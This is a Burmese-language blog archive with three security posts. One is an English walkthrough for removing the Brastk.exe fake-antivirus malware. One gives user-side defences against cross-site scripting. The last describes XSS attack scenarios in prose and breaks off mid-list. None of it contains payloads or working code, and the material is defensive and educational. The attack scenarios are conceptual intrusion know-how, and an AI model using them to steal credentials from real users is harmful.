ကၽြန္ေတာ္ခ်စ္ေသာသူငယ္ခ်င္းမ်ားအတြက္
...: ပညာေရး၊စီးပြားေရး၊ ဘာသာေရး၊ ဂီတ၊ ရုပ္ရွင္၊ စာေပ၊ နည္းပညာ၊ အိုင္တီ၊ ကူးယူရန္ေဆာ႔ဖ္၀ဲလ္မ်ားနဲ႕ အျခားေနရာမ်ားကို ဒီေနရာေလးကေန ေ၀မွ်ေပးလိုက္ပါတယ္ :...

... BE PEACEFUL AND HAPPY ALL THE MOMENTS, ALL MY FRIENDS ...

Showing posts with label Computer မ်ားရဲ႕ဂယ္ေပါက္မ်ား. Show all posts
Showing posts with label Computer မ်ားရဲ႕ဂယ္ေပါက္မ်ား. Show all posts

Nov 28, 2008

Killing and Removing Brastk.exe Malware

"Brastk.exe" (this link will open Google search with brastk.exe keyword) is a malware program and it stay in the following directories, and many paths of the registry.
C:Windows\
C:Windows\System32\
When a PC is infected with this malware,
- it appear in system tray with red icon with X,
- frequently display of a message, that The system is infected with a virus ... .
- if we click that message, then it tries to install "XP Antispyware 2009" (also a fake antispyware).
So it is very annoyed to infected PC and user.
To remove this malware from the infected pc, I used the following tools and techniques.

Tools

  1. TCPView (this link to SysInternal and will open in new window) to check all the open ports.
  2. Revo Uninstaller (this link to Revo Uninstaller Download page and will open in new window) to check and remove all "Auto Run" files and other unnecessary files.
  3. Hijackthis (this is direct download link to HijackThis and will open in new window) to check the contents of key areas of the Registry and hard drive--areas that are used by both legitimate programmers and hijackers.
  4. Malwarebytes' Anti-Malware program (this link to MBAM Download page and will open in new window) to check all malware finally.

Techniques

  1. Disable network connection.
  2. Run the Registry and look for the “brastk.exe”, all its paths and keys, and delete all.
  3. Find and delete the “brastk.exe” under C:\Windows\directory
  4. Used the tool “TCPView” to check all the open ports of infected PC. This “Brastk.exe” used, UDP port 1025. Then selected the process of “brastk.exe”, and use “End Process…” command from Process menu of the TCPView. This “brastk.exe” program run away at once from system tray.
After Killing the “brastk.exe” with TCPView,
  1. Delete the “brastk.exe” under C:\Windows\system32\ directory.
  2. Clean all temp files from %tmp%, %temp% and %prefetch%.
  3. Run Revo Uninstaller to check all start up files and unwanted files.
  4. Run Hijackthis and check all key areas of the Registry and hard drive again.
  5. Use Malwarebytes' Anti-Malware program to recheck all the rest of malware threats.
  6. Finally, Restart the infected PC and check again.
Now everything will be OK on the infected PC.
Any new ways and comments for this solutions are welcome.

Jul 22, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - ကာကြယ္နည္းမ်ား


XSS သို႕မဟုတ္ Cross-Site Scripting ရန္မွ ကာကြယ္မႈကို ေဆာင္ရြက္သည့္အခါ Web Developer မ်ားဘက္မွ ၄င္းတို႕၏ Web Site ကို XSS ေပ်ာ့ကြက္မ်ား ျဖစ္ေပၚမလာေအာင္ လိုအပ္ေသာ အကာအကြယ္မ်ားဖန္တီးျခင္း၊ User မ်ားမွ ထည့္သြင္းလိုက္ေသာ အခ်က္အလက္မ်ားကို စိစစ္ လက္ခံျခင္း အစရွိသည့္ ေဆာင္ရြက္မႈမ်ားကို ျပဳလုပ္ရသည္။ ထိုအပိုင္းကို ခ်န္ထားခဲ့ျပီး အင္တာနက္ သံုးသူတစ္ဦး အေနျဖင့္ XSS အႏၱရာယ္မွ မည္သို႕ အကာအကြယ္ျပဳရမည္၊ ေရွာင္တိမ္းရမည္ကို အဓိက ေဖာ္ျပသြားမည္ ျဖစ္သည္ -

၁. အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ေရြးခ်ယ္ျခင္း
အင္တာနက္ထဲတြင္ေလွ်ာက္သြားစဥ္ မိမိအတြက္ လံုျခံဳမႈရွိေစရန္ အကာအကြယ္ဖန္တီးသည့္အခါ တစ္ခုတည္းေသာ အေရးအၾကီးဆံုး အရာမွာ မိမိအသံုးျပဳမည့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲကို ေရြးခ်ယ္ျခင္း ျဖစ္သည္။ အင္တာနက္ သံုးသူ အမ်ားစုသည္ အမ်ားအားျဖင့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ တစ္ခုထက္ ပို၍ အသံုးျပဳေလ့ရွိၾကျပီး Website တစ္ခုကို ၾကည့္သည့္အခါ ေဆာ့ဖ္၀ဲ တစ္ခုျဖင့္ အဆင္မေျပလွ်င္ ေနာက္တစ္ခုျဖင့္ ေျပာင္းသံုးေလ့ ရွိၾကသည္။ ေဆာ့ဖ္၀ဲ ေရြးခ်ယ္သည့္အခါ သတိထားရမည့္ အခ်က္တစ္ခုမွာ - တိုက္ခိုက္မႈမ်ားသည္ အင္တာနက္သံုးေနသူ အမ်ားစုကို ပစ္မွတ္ထားသည္ - ဟူေသာ အခ်က္ ျဖစ္သည္။ လတ္တေလာ အေျခအေနတြင္ Firefox ေဆာ့ဖ္၀ဲမွာ လူသံုးမ်ားသည့္ ေဆာ့ဖ္၀ဲမ်ားထဲတြင္ “ ပိုမို လံုျခံဳေသာ ” အေနအထား တြင္ရွိျပီး၊ တိုက္ခိုက္သူမ်ား၏ အဓိက ပစ္မွတ္မွာ မိုကၠရိုေဆာ့ဖ္၏ Internet Explorer ျဖစ္ေနသည္။ ထို႕ျပင္ Mozilla, Netscape, Opera, ႏွင့္ Safari တို႕ကိုလည္း ေရြးခ်ယ္ အသံုးျပဳႏိုင္ေသးသည္။

-စိတ္ခ်စြာ အသံုးျပဳႏိုင္မည့္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲ တစ္ခု (သို႕) ႏွစ္ခုကို ေရြးပါ။


၂. အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ကို ပိုမိုလံုျခံဳေအာင္ ဖန္တီးျခင္း
မည္သည့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ကိုေရြးခ်ယ္ အသံုးျပဳသည္ျဖစ္ေစ ၄င္းတို႕ အတြက္ အကာအကြယ္ေပးမည့္ ပရိုဂရမ္မ်ား ႏွင့္ ကိရိယာ (Tools) မ်ားကို ထပ္မံေပါင္းစပ္ေပးျခင္းျဖင့္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲကို ပိုမို လံုျခံဳလာေအာင္ ဖန္တီးႏိုင္သည္။

  • Firefox အတြက္ - NoScript , SafeHistory, SafeCache,
  • Internet Explorer အတြက္ - eBay Toolbar
  • Firefox/Internet Explorer ႏွစ္မ်ဳိးလံုးအတြက္ Netcraft Anti-Phishing Toolbar, Google Toolbar စသည္တို႕မွာ -
လံုျခံဳမႈကိုမ်ားစြာ အေထာက္အပံ့ေပးႏိုင္သည့္ ကိရိယာမ်ား ျဖစ္ၾကသည္။
၄င္းတို႕သည္ သီးျခား ထည့္သြင္းေပးရသည့္ ပရိုဂရမ္မ်ား (Add-ons) မ်ားျဖစ္ျပီး -
  • Phishing web site မ်ားကို ေဖာ္ထုတ္ေပးျခင္း၊
  • web site မ်ား၏ အခ်ဳိ႕ေသာ အဂၤါရပ္မ်ား (Features)ကို ရပ္တန္႕ေပးထားျခင္း၊
  • အင္တာနက္သံုးသူမ်ား၏ စကား၀ွက္ စသည္မ်ားကို မသက္ဆိုင္သူမ်ား လက္ထဲသို႕ မေရာက္ေအာင္ ထိန္းသိမ္းကာကြယ္ေပးျခင္းႏွင့္
  • အျခားေသာ အသံုး၀င္သည့္ အကာအကြယ္ အမ်ဳိးမ်ဳိးကို ရရွိေစသည္။
Phishing - အီးေမးလ္ ကိုအသံုးျပဳျပီး အင္တာနက္သံုးသူတစ္ဦးကို အင္တာနက္ေနရာ( Web site) အတု တစ္ခုသို႕ ေရာက္လာေအာင္ဖန္တီးကာ credit card, social security, bank စာရင္းအမွတ္ စသည့္ အေရးၾကီးေသာ အခ်က္အလက္မ်ားကို လွည့္ဖ်ားရယူသည့္ အင္တာနက္ ရာဇ၀တ္မႈ တစ္မ်ဳိး။
      1. NoScript - https://addons.mozilla.org/firefox/722/
      2. SafeHistory - www.safehistory.com/
      3. SafeCache - www.safecache.com/
      4. Netcraft Anti-Phishing Toolbar -http://toolbar.netcraft.com/
      5. eBay Toolbar -http://pages.ebay.com/ebay_toolbar/
      6. Google Toolbar - www.google.com/tools/firefox/toolbar/index.html

-လိုအပ္ေသာ ပရိုဂရမ္မ်ား ႏွင့္ ကိရိယာမ်ား ထပ္မံေပါင္းထည့္ေပးပါ။



၃. အခ်ဳိ႕ေသာ အဂၤါရပ္မ်ားကို ရပ္တန္႕ထားျခင္း
အရိုးစင္းဆံုးေျပာရလွ်င္ အဂၤါရပ္ (Features) အခ်ဳိ႕ကိုသာ အလုပ္လုပ္ေစျခင္းသည္ အင္တာနက္ထဲတြင္ သြားလာရသည့္အခါ ပိုမို စိတ္ခ် လံုျခံဳသည့္ အေနအထားကို ျဖစ္ေပၚေစသည္။ ေျပာရလွ်င္ JavaScript, Java, Active X, JScript, VBScript,Flash, ႏွင့္ QuickTime တို႕အားလံုးမွာ အႏၱရာယ္ေပးႏိုင္သည့္ အရာမ်ား ျဖစ္သည္။ ၄င္းနည္းပညာမ်ားသည္ အင္တာနက္လူဆိုးမ်ားအတြက္ လက္နက္ပံုစံသစ္မ်ား ျဖစ္လာ ၾကသည္။ မေကာင္းေသာ အခ်က္တစ္ခုမွာ အဆိုပါ အဂၤါရပ္မ်ားကို အလုပ္မလုပ္ႏိုင္ေအာင္ ရပ္တန္႔ထား ျခင္းသည္ အခ်ဳိ႕ေသာ Web site မ်ား၏ အလုပ္လုပ္မႈ အေနအထားကို ရပ္တန္႕ေစျခင္း၊ တ၀က္တပ်က္သာ အလုပ္လုပ္ေစျခင္း စသည္တို႕ ျဖစ္ေပၚလာေစႏိုင္သည္။
မည္သို႕ပင္ ျဖစ္ေစ ၄င္းတို႕ကိုရပ္တန္႕ထားျခင္းက ပို၍ အက်ဳိးမ်ားေစသည္။ ထို႕ေၾကာင့္ အခ်ဳိ႕ေသာ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲမ်ား ႏွင့္ ၄င္းတို႕၏ ေနာက္ဆက္တြဲမ်ား (Extensions) သည္ အထက္တြင္ေဖာ္ျပခဲ့သည့္ အဂၤါရပ္မ်ားကို လိုအပ္သလို ဖြင့္/ပိတ္ျခင္းမ်ားကို အလ်င္ အျမန္ ေဆာင္ရြက္ေပးႏိုင္ ေအာင္ဖန္တီးထားျခင္းျဖစ္သည္။

-အႏၱရာယ္ေပးႏိုင္ေသာ အခ်ဳိ႕အရာမ်ား (JavaScript, Java, Active X, JScript, VBScript, Flash, ႏွင့္ QuickTime) ကို မျဖစ္မေန လိုအပ္မွသာ အလုပ္လုပ္ပါေစ။ မလိုအပ္က ရပ္ထားပါ။


၄. ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) တစ္ခုကို သံုးျခင္း
ယခုအခါ ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) ကဲ့သို႕ေသာ အတုဖန္တီးထားသည့္ ေနရာမ်ားမွတဆင့္ အင္တာနက္ကို အသံုးျပဳေနသူမ်ား တေန႕ထက္တေန႕ တိုးတက္ မ်ားျပားလာေနျပီ ျဖစ္သည္။ အကယ္၍ အေျခအေန တစ္ခုခု ထူးျခားမႈျဖစ္ေပၚလာပါက စက္အတုထဲတြင္သာ ျပႆနာ တက္မည္ျဖစ္ျပီး ပင္မ ကြန္ပ်ဳတာကို ထိခိုက္မႈ မရွိႏိုင္ေပ။
ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) - တကယ့္ ကြန္ပ်ဳတာတစ္လံုးကဲ့သို႕ အလုပ္လုပ္ေပးႏိုင္ေသာ ကြန္ပ်ုဳတာ ေဆာ့ဖ္၀ဲတစ္မ်ဳိး၊ Operating System တစ္ခု ထည့္သြင္းတပ္ဆင္ေပးရသည္။ အျခားေသာ ေဆာ့ဖ္၀ဲမ်ားလည္း ထည့္သြင္းႏိုင္သည္။
-မိမိအကၽြမ္းတ၀င္မရွိေသာ Web site မ်ား၊ ေဆာ့ဖ္၀ဲမ်ားကို စမ္းသပ္ အသံုးျပဳရသည့္အခါ ေဘးကင္းေစရန္ အတြက္ ကြန္ပ်ဳတာ စက္အတု (Virtual Machine) ကို အသံုးျပဳပါ။


၅. အီးေမးလ္ အတြင္းရွိ အင္တာနက္ လိပ္စာမ်ားကို ဘယ္ေတာ့မွ ကလစ္မလုပ္ပါႏွင့္
အီးေမးလ္အတြင္းပါ၀င္လာသည့္ -
  • လိပ္စာႏွင့္ အင္တာနက္ေနရာမ်ား၊
  • ရုပ္ပံုမ်ား ကို တတ္ႏိုင္သမွ် မည္သည့္ အခ်ိန္တြင္မွ ကလစ္မလုပ္ပါႏွင့္။
  • ၄င္းလိပ္စာမ်ားသည္ပင္ အႏၱရာယ္ျဖစ္ေနျပီး၊
  • Phishing အီးေမလ္မ်ားကို ရွာေဖြ ေဖာ္ထုတ္ႏိုင္ရန္မွာလည္းခက္ခဲသည္။
အကယ္၍ အီးေမးလ္တစ္ေစာင္သည္ အစစ္အမွန္ျဖစ္ေၾကာင္း မေသခ်ာပါက၊ ေဆာင္ရြက္ႏိုင္သည့္ အေကာင္းဆံုးနည္းမွာ ေပးထားေသာ လိပ္စာကို အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ၏ လိပ္စာေဖၚျပသည့္ေနရာတြင္ ကိုယ္တိုင္ရုိက္ျပီး ထည့္သြင္းျခင္းျဖစ္သည္။ ဤနည္းအားျဖင့္ မိမိေရာက္သြားမည့္ေနရာသည္ အစစ္အမွန္ေနရာတစ္ခု ျဖစ္ေၾကာင္း အေတာ္အတန္ အာမခံခ်က္ ရရွိႏိုင္ေပသည္။

ခြ်င္းခ်က္ တစ္ခုေတာ့ ထားရွိရမည္ ျဖစ္သည္။
ဥပမာအားျဖင့္ မိမိ၏လုပ္ေဆာင္မႈ တစ္ခုကို တုုန္႕ျပန္ေပးရန္ ခ်က္ခ်င္း ေပးပို႕လာေသာ အီးေမးလ္မ်ား
(Web site တစ္ခုတြင္ မွတ္ပံုတင္ျခင္း၊ စကား၀ွက္ ေမ့သြားျခင္း ေၾကာင့္ ျပန္ေတာင္းျခင္း/ျပန္ျပင္ျခင္း၊ ကုန္၀ယ္အမွာစာ အတည္ျပဳျခင္း .. စသည္) ကို မိနစ္ပိုင္းအတြင္း ျပန္လည္ တုန္႕ျပန္ ေဆာင္ရြက္ေပးရသည့္ အခါမ်ဳိး အတြက္ ျဖစ္သည္။
-မိမိ၏ လိုအပ္ခ်က္ေၾကာင့္ ခ်က္ခ်င္းေရာက္လာျပီး ခ်က္ခ်င္းတုန္႕ျပန္ေပးရမည့္ အီးေမးလ္မ်ားအတြင္းရွိ လိပ္စာမ်ားမွ အပ၊ အျခားမည္သည့္ အီးေမးလ္မ်ားအတြင္းရွိ လိပ္စာမ်ား၊ ပံုမ်ား ကိုမဆို ကလစ္ မလုပ္ပါႏွင့္။


၆. မိမိ၏ Web mail ကို ကာကြယ္ထားပါ
လူသန္းေပါင္းမ်ားစြာတို႕သည္ နည္းအမ်ဳိးမ်ဳိးျဖင့္ Web mail မ်ားကို အသံုးျပဳလ်က္ ရွိေနၾကသည္။ ၄င္းကို မိမိ၏ ဘဏ္စာရင္း နံပါတ္ ထက္ပင္ လွ်ဳိ၀ွက္ သိမ္းဆည္းထားသင့္ေပသည္။ လူေပါင္းမ်ားစြာတို႕သည္ အေရးၾကီးေသာ အင္တာနက္ ေပၚမွ Account မ်ားကို Web mail လိပ္စာ တစ္ခုတည္းျဖင့္ ရယူ သိမ္းဆည္း ထားတတ္ေလ့ရွိၾကသည္။ အကယ္၍ တစ္စံုတစ္ေယာက္က မိမိ၏ အီးေမးလ္လိပ္စာကို နည္းလမ္းတစ္ခုခုျဖင့္ အသံုးျပဳႏိုင္သြားမည္ဆိုပါက ထိုသူသည္ ၄င္းအီးေမးလ္တြင္ ခ်ိတ္ဆက္ထားေသာ အျခားေသာ Account မ်ားကိုပါ သံုးခြင့္ရသြားမည္ ျဖစ္သည္။

သင့္အေနျဖင့္ ေဆာင္ရြက္ႏိုင္သည့္ အေကာင္းဆံုးအရာတစ္ခုမွာ -
  • အလြယ္တကူ မခန္႕မွန္းႏိုင္ေသာ စကား၀ွက္မ်ဳိးကို အသံုးျပဳျခင္း၊
  • စကား၀ွက္မ်ားကို အနည္းဆံုး ၃ လတစ္ၾကိမ္ ေျပာင္းလဲျခင္း၊
  • ၄င္းစကား၀ွက္ကို အျခားမည္သည့္ေနရာတြင္မွ မသံုးျခင္း၊
  • အလုပ္အမ်ဳိးမ်ဳိးအတြက္ အီးေမးလ္ လိပ္စာ အဆင့္အတန္းအမ်ဳိးမ်ဳိးထားရွိ အသံုးျပဳျခင္း တို႕ ျဖစ္သည္။
အေရးၾကီးေသာ အခ်က္အလက္မ်ားပါ၀င္ေနသည့္ မည္သည့္ အီးေမးလ္ကိုမဆို ဖတ္ရႈျပီးသည့္အခါ ဖ်က္ဆီးပစ္လိုက္ျခင္း သည္လည္း ေကာင္းမြန္ေသာ လုပ္ေဆာင္ခ်က္ တစ္ခု ျဖစ္သည္။
-မိမိ၏ အီးေမးလ္ စကား၀ွက္ ကို ေကာင္းစြာ ကာကြယ္ထားပါ။ အေရးၾကီးေသာ အေၾကာင္းအရာမ်ားကို အီးေမးလ္ Inbox ထဲတြင္ သိမ္းမထားပါႏွင့္။ အမ်ားႏွင့္ သက္ဆိုင္ေသာ၊ လူမ်ားစုအတြက္ ခ်ေပးရမည့္ အီးေမးလ္လိပ္စာကို အျခား အေရးၾကီးေသာ ေနရာမ်ားတြင္ မသံုးပါႏွင့္။


၇. ရွည္လ်ားေသာ အင္တာနက္လိပ္စာမ်ားကို သတိထားပါ
အကယ္၍ အင္တာနက္လိပ္စာ တစ္ခုသည္ စာေၾကာင္း တစ္ေၾကာင္းထက္ပိုမိုိုရွည္လ်ားျပီး၊ ရာခိုင္ႏႈန္း သေကၤတမ်ား % ျဖင့္ ေျပာင္းလဲ ေဖာ္ျပထားပါက အထူးသတိျပဳသင့္သည္။ အကယ္၍ အင္တာနက္လိပ္စာ တစ္ခု၏ သဘာ၀ အမွန္ကို မသိပါက ၄င္းတို႕ကို မူရင္း သေကၤတ အျဖစ္ ျပန္ေျပာင္းျပီး အတြင္းတြင္ HTML သေကၤတမ်ား ပါ၀င္ေနျခင္း ရွိမရွိ စစ္ေဆးပါ။

-HTML သေကၤတမ်ား ပါ၀င္ေနပါက ၄င္းလိပ္စာကို ကလစ္မလုပ္ပါႏွင့္။


၈. URL အတိုခ်ဳံးေပးေသာ ၀န္ေဆာင္မႈမ်ား
URL အတိုခ်ဳံးေပးေသာ ၀န္ေဆာင္မႈမ်ားကို သတိထားပါ။ အခ်ဳိ႕ေသာ အင္တာနက္လူဆိုးမ်ားသည္ မိမိတို႕၏ ေကာက္က်စ္ေသာ အင္တာနက္လိပ္စာမ်ားကို ကြယ္၀ွက္ႏိုင္ရန္အတြက္ TinyURL, snipURL, notlong, shorl, ႏွင့္ doiop တို႕ကဲ့သို႕ေသာ အင္တာနက္လိပ္စာ ေျပာင္းေပးသည့္ ၀န္ေဆာင္မႈမ်ားကို သံုးေလ့ရွိၾကသည္။ ထိုကဲ့သို႕ေသာ လိပ္စာမ်ားကို စစ္ေဆးႏိုင္ရန္အတြက္ လိုအပ္ပါက Command Line ထဲတြင္ ရိုက္ထည့္ျပီး တိုက္ရိုက္ စစ္ေဆး ၾကည့္ႏိုင္သည္။ အကယ္၍ လိပ္စာ အစစ္အမွန္ျဖစ္ပါက အမွန္အတိုင္းလမ္းညႊန္မည္ ျဖစ္သည္။ ယခုကဲ့သို႕ လိပ္စာေျပာင္းေပးေသာ ၀န္ေဆာင္မႈမ်ားသည္လည္း ၄င္းတို႕ထံေရာက္လာေသာ လိပ္စာ မွန္မမွန္ကို အာမခံႏိုင္မည္ မဟုတ္ေပ။
-ထို႕ေၾကာင့္ မည္သည့္ ေနရာကိုမဆို ကလစ္ လုပ္ေတာ့မည္ဆိုပါက အထူးသတိထားရန္လိုမည္ ျဖစ္ေပသည္။ မသိေသာ၊ သံသယရွိေနေသာ လိပ္စာမ်ားကို ကလစ္မလုပ္ပါႏွင့္။


သတိျပဳေစလိုသည္မွာ - ယခုေဖာ္ျပထားေသာ အခ်က္မ်ား သည္လည္း မိမိတို႕ကို အေတာ္အသင့္ မွ်သာ အကာအကြယ္ေပးႏိုင္မည္ျဖစ္ျပီး ရာႏႈန္းျပည့္ အကာအကြယ္ ေပးႏိုင္မႈအတြက္ သက္ဆိုင္သူ တစ္ဦးခ်င္းစီ အေနျဖင့္ အျမဲမျပတ္ ဆက္လက္ ေလ့လာသြားရန္ အထူးပင္ အေရးၾကီးလွပါေၾကာင္း -


REF -
- http://en.wikipedia.org/wiki/Xss
- http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS Attacks - CROSS SITE SCRIPTING EXPLOITS AND DEFENSE by Syngress

Jul 10, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting -တိုက္ခိုက္မႈ နမူနာမ်ား


XSS တိုက္ခိုက္မွႈ နမူနာမ်ား

XSS ဂယ္ေပါက္ အမ်ဳိးမ်ဳိးရွိေနသည့္အတြက္ တိုက္ခိုက္သူမ်ား၏ လုပ္ေဆာင္ပံုမ်ားမွာလည္း အမ်ဳိးမ်ဳိး ျဖစ္လာႏိုင္သည္။
တိုက္ခိုက္မႈနမူနာမ်ားကို ေလ့လာၾကည့္ၾကပါစို႕ ...

အားနည္းခ်က္ (၁)-တိုက္ခိုက္မႈ

  1. တိုက္ခိုက္သူသည္ သားေကာင္ဆီသို႕ အီးေမးလ္ သို႕မဟုတ္ အျခားေသာ နည္းလမ္းတစ္ခု ျဖင့္ ေကာက္က်စ္စြာဖန္တီးထားေသာ အင္တာနက္စာမ်က္ႏွာ တစ္ခုကို ဖြင့္ေပးမည့္ အင္တာနက္လိပ္စာ (ဥပမာ - --www.attackexample.com/test/readme.html-- )တစ္ခုကို ေပးပို႕လိုက္သည္။
  2. သားေကာင္က ထို လိပ္စာကို ႏွိပ္ လိုက္သည္။ (click လုပ္လိုက္သည္။) ဤတြင္ တိုက္ခိုက္သူ၏ ဖန္တီးထားေသာအင္တာနက္ စာမ်က္ႏွာမွာ သားေကာင္၏ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲတြင္ ပြင့္လာသည္။
  3. တိုက္ခိုက္သူက ၾကိဳတင္ဖန္တီးထားသည့္အတိုင္းပင္ ၄င္းစာမ်က္ႏွာတြင္ ပါလာေသာ JavaScript သေကၤတမ်ားက သားေကာင္၏ ကြန္ပ်ဳတာထဲတြင္ ရွိႏွင့္ေနေသာ ဟာကြက္ ျဖစ္ေပၚေနသည့္ အင္တာနက္စာမ်က္ႏွာ တစ္ခုကို ထပ္ဖြင့္လိုက္ၾကသည္။
  4. အဆိုပါ ဟာကြက္ျဖစ္ေပၚေနသည့္ အင္တာနက္စာမ်က္ႏွာထဲတြင္ ပါ၀င္ေနေသာ JavaScript သေကၤတမ်ားက သားေကာင္၏ ကြန္ပ်ဳတာ ဟာ့ဒ္ဒစ္ (Local zone) အတြင္းတြင္ ေကာင္းစြာ အလုပ္လုပ္ႏိုင္သည္။
  5. ဤနည္းအားျဖင့္ တိုက္ခိုက္သူေပးပို႕လိုက္ေသာ ေကာက္က်စ္စြာ ဖန္တီးထားေသာ သေကၤတမ်ားသည္ သားေကာင္၏ ကြန္ပ်ဴတာထဲတြင္ ၾကိဳတင္ရွိေနေသာ ဟာကြက္ကို အခြင့္ေကာင္းယူ အသံုးခ်လ်က္ -
    1. အမိန္႕ေပးခ်က္မ်ား ေပးပို႕ ခိုင္းေစႏိုင္သည္။
    2. အခ်ဳိ႕ေသာ ေဆာ့ဖ္၀ဲမ်ား ပရိုဂရမ္မ်ားကို သားေကာင္မသိဘဲ တိတ္တဆိတ္ အလုပ္လုပ္ေစႏိုင္သည္။
    3. တိုက္ခိုက္သူထံအခ်က္အလက္မ်ား ျပန္လည္ေပးပို႕ႏိုင္သည္။
အားနည္းခ်က္ (၂)-တိုက္ခိုက္မႈ
  1. ေက်ာ္ေက်ာ္သည္ ေအာင္ေအာင္တည္ေထာင္ထားေသာ ၀က္ဘ္ဆိုက္တစ္ခုဆီသို႕ မၾကာခဏ ၀င္ေရာက္လည္ပတ္ေလ့ ရွိသည္။ ၄င္း၀က္ဘ္ဆိုက္သို႕ ၀င္ေရာက္ႏိုင္ရန္အတြက္ ေက်ာ္ေက်ာ္သည္ Username ႏွင့္ Password တစ္ခုကို အသံုးျပဳရသည္။ ၀က္ဘ္ဆိုက္ ထဲတြင္ ေက်ာ္ေက်ာ္၏ ေငြေၾကးဆိုင္ရာ အခ်က္အလက္ မ်ားကဲ့သို႕ေသာ အေရးၾကီး အခ်က္အလက္မ်ား သိမ္းဆည္းထားသည္။
  2. တိုက္ခိုက္သူတစ္ဦးက ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္တြင္ “အေျခအေနအေပၚမူတည္ျပီး ျဖစ္ေပၚလာေသာေပ်ာ႕ကြက္ - Reflected XSS ” တစ္ခု ျဖစ္ေပၚေနေၾကာင္း ေလ့လာ ေတြ႕ရွိထားသည္။
  3. တိုက္ခိုက္သူသည္ အဆိုပါ အားနည္းခ်က္ကို အျမတ္ထုတ္ႏိုင္ရန္အတြက္-
    1. (ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္လိပ္စာႏွင့္ ဆင္တူယိုးမွား) အင္တာနက္လိပ္စာအတုတစ္ခုကို ဖန္တီးလိုက္ျပီး ေက်ာ္ေက်ာ္ထံသို႕ အီးေမးလ္တစ္ေစာင္ေပးပို႕လိုက္သည္။
    2. ၄င္းအီးေမးလ္ကိုလည္း ေအာင္ေအာင့္ ထံမွ ေပးပို႕သည့္အလား အျပင္အဆင္တူေအာင္ အားလံုး လွည့္စား ဖန္တီး ထားသည္။
    3. (အင္တာနက္ လံုျခံဳေရးနယ္ပယ္တြင္ ဤနည္းစနစ္ကို အီးေမးလိပ္စာ လွည့္ဖ်ားျခင္း - e-mail address spoofing ဟု ေခၚၾကသည္။)
      (ဥပမာ - --www.google.com-- အစား --www.googla.com--, --www.domainname.com အစား --www.domainame.com-- etc)
  4. ေက်ာ္ေက်ာ္သည္-
    1. ( ၄င္းမၾကာခဏ အသံုးျပဳေနေသာ ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္မွ ေပးပို႕သည့္စာ အမွတ္ျဖင့္) တိုက္ခိုက္သူ၏ အီးေမးလ္ကို ဖြင့္ၾကည့္ရင္း
    2. အထဲရွိ အင္တာနက္လိပ္စာ အတိုင္း လိုက္သြားကာ ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္တြင္ Log In ျပဳလုပ္သည္။
  5. ဤတြင္-
    1. တိုက္ခိုက္သူ ဖန္တီးထားေသာ အင္တာနက္လိပ္စာ အတုအတြင္း ျမဳတ္ႏွံထည့္သြင္း ထားေသာ မသမာသည့္ သေကၤတမ်ားက
    2. ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္ အတြင္းမွ တိုက္ရိုက္ေပးပို႕လိုက္ေသာ သေကၤတမ်ား ကဲ့သို႕ ဟန္ေဆာင္ကာ
    3. ေက်ာ္ေက်ာ္၏ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲအတြင္းတြင္ အလုပ္လုပ္ေတာ႕သည္။
    4. ေက်ာ္ေက်ာ္မွ ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္ အတြင္းသို႕ ၀င္ေရာက္ႏိုင္ရန္ ထည့္သြင္းေပးရေသာ အေရးၾကီးေသာ အခ်က္အလက္မ်ား (User name, Password, Billing informations .... etc.)ကုိ ခိုးယူကာ တိုက္ခိုက္သူထံသို႕ တိတ္တဆိတ္ေပးပို႕ ေနေတာ႕သည္။
    5. example - Image taken from Microsoft MSDN libarary for XSS
အားနည္းခ်က္ (၃)-တိုက္ခိုက္မႈ
  1. ေအာင္ေအာင္သည္ ၀က္ဘ္ဆိုက္တစ္ခုကို တည္ေထာင္ထားသည္။ ၄င္းဆိုက္ကို အသံုးျပဳေနၾကေသာ သူမ်ားသည္ အျခားေသာသူမ်ား ဖတ္ရႈေစႏိုင္ရန္အတြက္ အသိေပးခ်က္မ်ားႏွင့္ အျခားအေၾကာင္းအရာမ်ားကို ေပးပို႕ခြင့္ရွိၾကသည္။( ဥပမာ-အင္တာနက္ေပၚရွိ ဖိုရမ္မ်ား)
  2. တိုက္ခိုက္သူ တစ္ဦးသည္ ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္တြင္ XSS အားနည္းခ်က္(၃) ကို အသံုးျပဳ၍ တိုက္ခိုက္ႏိုင္သည့္ ေပ်ာ့ကြက္ရွိေနေၾကာင္း သတိထားမိသည္။
  3. တိုက္ခိုက္သူသည္ (လူ႕တို႕၏ စိတ္၀င္စားတတ္ေသာ သဘာ၀ကိုေကာင္းစြာအသံုးခ်လ်က္) ၀က္ဘ္ဆိုက္သို႕ ေရာက္လာမည့္ အျခားသူမ်ားလည္း ေသခ်ာေပါက္လာေရာက္ၾကည့္ရႈမည့္ အျငင္းပြားဖြယ္ရာ ေဆြးေႏြးျငင္းခုန္စရာ အသိေပးခ်က္အခ်ဳိ႕ကို တင္ထားလိုက္သည္။
  4. ထိုအသိေပးခ်က္မ်ားထဲတြင္ တိတ္တဆိတ္ ျမဳတ္ႏွံထည့္သြင္းထားေသာ သေကၤတမ်ားေၾကာင့္၊ လာေရာက္ဖတ္ရႈၾကသည့္-
